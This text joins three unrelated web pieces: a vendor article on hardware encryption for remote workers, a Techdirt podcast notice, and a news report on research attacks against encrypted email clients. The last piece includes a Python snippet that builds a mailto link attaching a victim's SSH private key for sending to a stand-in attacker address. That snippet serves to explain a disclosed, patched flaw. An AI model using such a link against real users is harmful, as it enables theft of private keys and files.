Remote working is still the norm within many organisations, and will become a permanent model for some, potentially increasing cyber-risk at a time when regulatory powers grow ever stronger. Against this backdrop, organisations are increasingly turning towards the encryption of data, along with additional endpoint controls, to manage risk.

Even with appropriate security software and firewalls in place, the human threat persists. In Apricorn's annual survey into organisations' attitudes towards data breaches, more than half (57 percent) of UK IT decision makers said they expect remote workers to expose their organisation to the risk of a data breach. Employees unintentionally putting data at risk remains the leading cause of a data breach, with lost or misplaced devices the second biggest cause.

More and more organisations are mitigating these concerns by implementing greater data encryption and strengthening endpoint controls.

Locking down the data

When asked whether they'd seen an increase in the implementation of encryption in their organisation since GDPR was enforced, 41% of survey respondents said they had.

Legislation hasn't taken a break over lockdown either, and data encryption is a simple step towards GDPR compliance, as it safeguards personal data. The regulation has clear mandates for encryption within Article 32, while Article 34 removes the obligation to individually inform each citizen affected by a data breach if encryption has been applied. Article 83 suggests that fines will be moderated where a company can show it has been responsible and mitigated damage suffered by data subjects.

The first step to ensuring data is encrypted as standard across the organisation is to enshrine the requirement in company security policy and enforce it wherever possible through technology. Two thirds of IT leaders said their organisation now has a policy of hardware encrypting all information, whether it's at rest or in transit. Nearly all (94 percent) have a policy that requires encryption of all data held on removable media such as USB sticks and portable hard drives, a big rise from 66 percent in 2019. Of these, 57 percent use hardware encryption, which is seen as the gold standard.

Hardware encryption offers much greater security than software encryption, and PIN pad authenticated, hardware encrypted USB storage devices offer additional, significant benefits. Being software-free eliminates the risk of software hacking and keylogging; all authentication and encryption processes take place within the device itself, so passwords and key data are never shared with a host computer. This makes such devices particularly suited for use in highly regulated sectors such as defence, finance, government and healthcare.

By deploying removable storage devices with built-in hardware encryption, a business can roll this approach out across the workforce, ensuring all data can be stored or moved around safely offline. Even if the device is lost or stolen, the information will be unintelligible to anyone not authorised to access it.

Locking down the endpoint

With employees typically using a mix of personal and corporate devices to access data, systems and networks, businesses need to have confidence that the endpoint as well as the data is secure.

Every organisation should cover the use of employees' own IT equipment for mobile and remote working in their information security strategy. Forty-two percent of UK IT leaders say that their organisations only permit the use of corporate IT provisioned or approved devices, and have strict security measures in place to enforce this with endpoint control, a huge rise compared with 11 percent in 2019.

There is room for improvement in this area, however: 6% of organisations don't cover shadow IT in their information security strategy, while 7% tell employees they're not allowed to use removable media but don't have technology in place to prevent this.

At a time when such a large proportion of the workforce is operating outside the confines and relative safety of the office and corporate network, any holes in security policy will create unacceptable risk. All organisations must recognise the importance of endpoint controls and hardware encryption and how they can work together to help comply with data protection regulations and reduce the potential for a breach.

This is more critical than ever: the new societal values shaped by COVID-19 have thrown the importance of doing business responsibly into sharp focus. Preventing a data breach will not only mitigate against the financial costs, it will also protect an organisation's reputation and the trust of its customers.

Author: Jon Fielding, managing director EMEA, Apricorn


Techdirt Podcast Episode 252: The Key To Encryption – Techdirt

from the or-lack-thereof dept

This week we've got another cross-post, with the latest episode of The Neoliberal Podcast from the Progressive Policy Institute. Host Jeremiah Johnson invited Mike, along with PPI's Alec Stapp, to discuss everything about encryption: the concept itself, the attempts at laws and regulations, and more.

Follow the Techdirt Podcast on Soundcloud, subscribe via iTunes or Google Play, or grab the RSS feed. You can also keep up with all the latest episodes right here on Techdirt.

Thank you for reading this Techdirt post. With so many things competing for everyone's attention these days, we really appreciate you giving us your time. We work hard every day to put quality content out there for our community.

Techdirt is one of the few remaining truly independent media outlets. We do not have a giant corporation behind us, and we rely heavily on our community to support us, in an age when advertisers are increasingly uninterested in sponsoring small, independent sites, especially a site like ours that is unwilling to pull punches in its reporting and analysis.

While other websites have resorted to paywalls, registration requirements, and increasingly annoying/intrusive advertising, we have always kept Techdirt open and available to anyone. But in order to continue doing so, we need your support. We offer a variety of ways for our readers to support us, from direct donations to special subscriptions and cool merchandise, and every little bit helps. Thank you.

The Techdirt Team

Filed Under: alec stapp, encryption, jeremiah johnson, podcast


Researchers Develop Attacks Targeting End-to-End Encryption in Emails – Decipher

Attack Types

Researchers were able to show how an adversary could automatically install certificates contained in S/MIME communications. For example, the researchers identified a design flaw in a client's key update mechanism which could be abused to replace the public keys used in encrypted S/MIME communications. The researchers were able to silently replace the encryption key for six S/MIME-supporting email clients.

A man-in-the-middle attack would involve an internet or email provider, or a compromised SMTP or IMAP server.

Email clients could also be tricked into decrypting ciphertext messages or signing arbitrary messages and then sending them to an IMAP server controlled by the attacker. For three OpenPGP-capable clients, the researchers exfiltrated the plaintext to an IMAP server controlled by an attacker, or misused the clients as signing oracles.

The researchers tested 20 popular email clients, supporting either S/MIME or OpenPGP, from a list of more than 50 clients across major platforms (Windows, Linux, macOS, Android, and iOS), as well as web-based applications. As the table (Table 2 from the paper) shows, researchers were able to replace the keys in the Windows versions of Microsoft Outlook. "For Microsoft Outlook, we could verify the existence of this dangerous feature since at least Outlook 2007," the researchers wrote.

An evaluation shows that 8 out of 20 tested email clients are vulnerable to at least one attack, the researchers found. More specifically, five out of 18 OpenPGP-capable email clients and six out of 18 S/MIME-capable clients were vulnerable to at least one attack.

The researchers were also able to abuse the mailto: URI method, which allows third-party applications to open a separate email client to compose a message, to secretly attach local files to email messages and send them to an attacker's address. The mailto method is often used on websites, where clicking on a link can launch the locally installed email client with the recipient field (To) pre-populated with the email address the message is going to. It is possible to pre-populate other fields, such as a subject line and even the body of the message.

The issue lies in how email clients implemented RFC 6068, the technical standard describing mailto. The researchers found that several parameters the mailto URI passes to the email client could be abused to trick the client into decrypting ciphertext messages, or signing messages and sending them to attackers. One example is how the mailto method uses the attach or attachment parameters to open an email window with a file already attached. If the user does not notice that the email window has the file attached, the user could inadvertently send sensitive information such as encryption (PGP) keys, SSH private keys, configuration files, and other sensitive data.
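
As a concrete illustration of the attack surface (the address and file path below are hypothetical, and attach is one of the parameters the researchers singled out), an attacker-controlled page could embed a link like the one this snippet builds; a vulnerable client opening it would silently pre-attach the victim's local file to an outgoing message:

```python
from urllib.parse import quote

# Hypothetical values for illustration only.
attacker = "attacker@example.com"          # where the composed mail would go
target_file = "/home/victim/.ssh/id_rsa"   # sensitive local file to exfiltrate

link = (
    f"mailto:{attacker}"
    f"?subject={quote('Monthly newsletter')}"  # innocuous-looking subject
    f"&attach={quote(target_file, safe='/')}"  # parameter some clients honored
)
print(link)
# mailto:attacker@example.com?subject=Monthly%20newsletter&attach=/home/victim/.ssh/id_rsa
```

Patched clients, such as the recent Thunderbird releases mentioned below, simply no longer honor attachment-related parameters arriving from untrusted mailto links.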

Researcher Müller posted a video on Twitter illustrating how mailto parameters could be abused. The researchers were able to perform this attack on four of the tested clients.

The researchers were able to attach files by knowing the exact file paths for the desired files, using wildcard characters to attach multiple files in a given location, or using URLs pointing to internal network shares. They were also able to use IMAP links to steal email messages from a user's IMAP email inbox.

The vulnerabilities were reported to the affected vendors in February. The list includes IBM/HCL Notes (CVE-2020-4089), GNOME Evolution (CVE-2020-11879), and KDE KMail (CVE-2020-11880). The details for CVE-2020-12618 and CVE-2020-12619 have not been made public. Thunderbird versions 52 and 60 for Debian/Kali Linux were affected, as they had problems with the mailto parameter allowing local files (such as an SSH private key) to be attached to outgoing messages. Recent versions of Thunderbird are not vulnerable, as the issue with the mailto?attach= parameter was fixed in Thunderbird last year.

"While our attacks do not target the underlying cryptographic primitives, they raise concerns about the practical security of OpenPGP and S/MIME email applications," the researchers wrote.
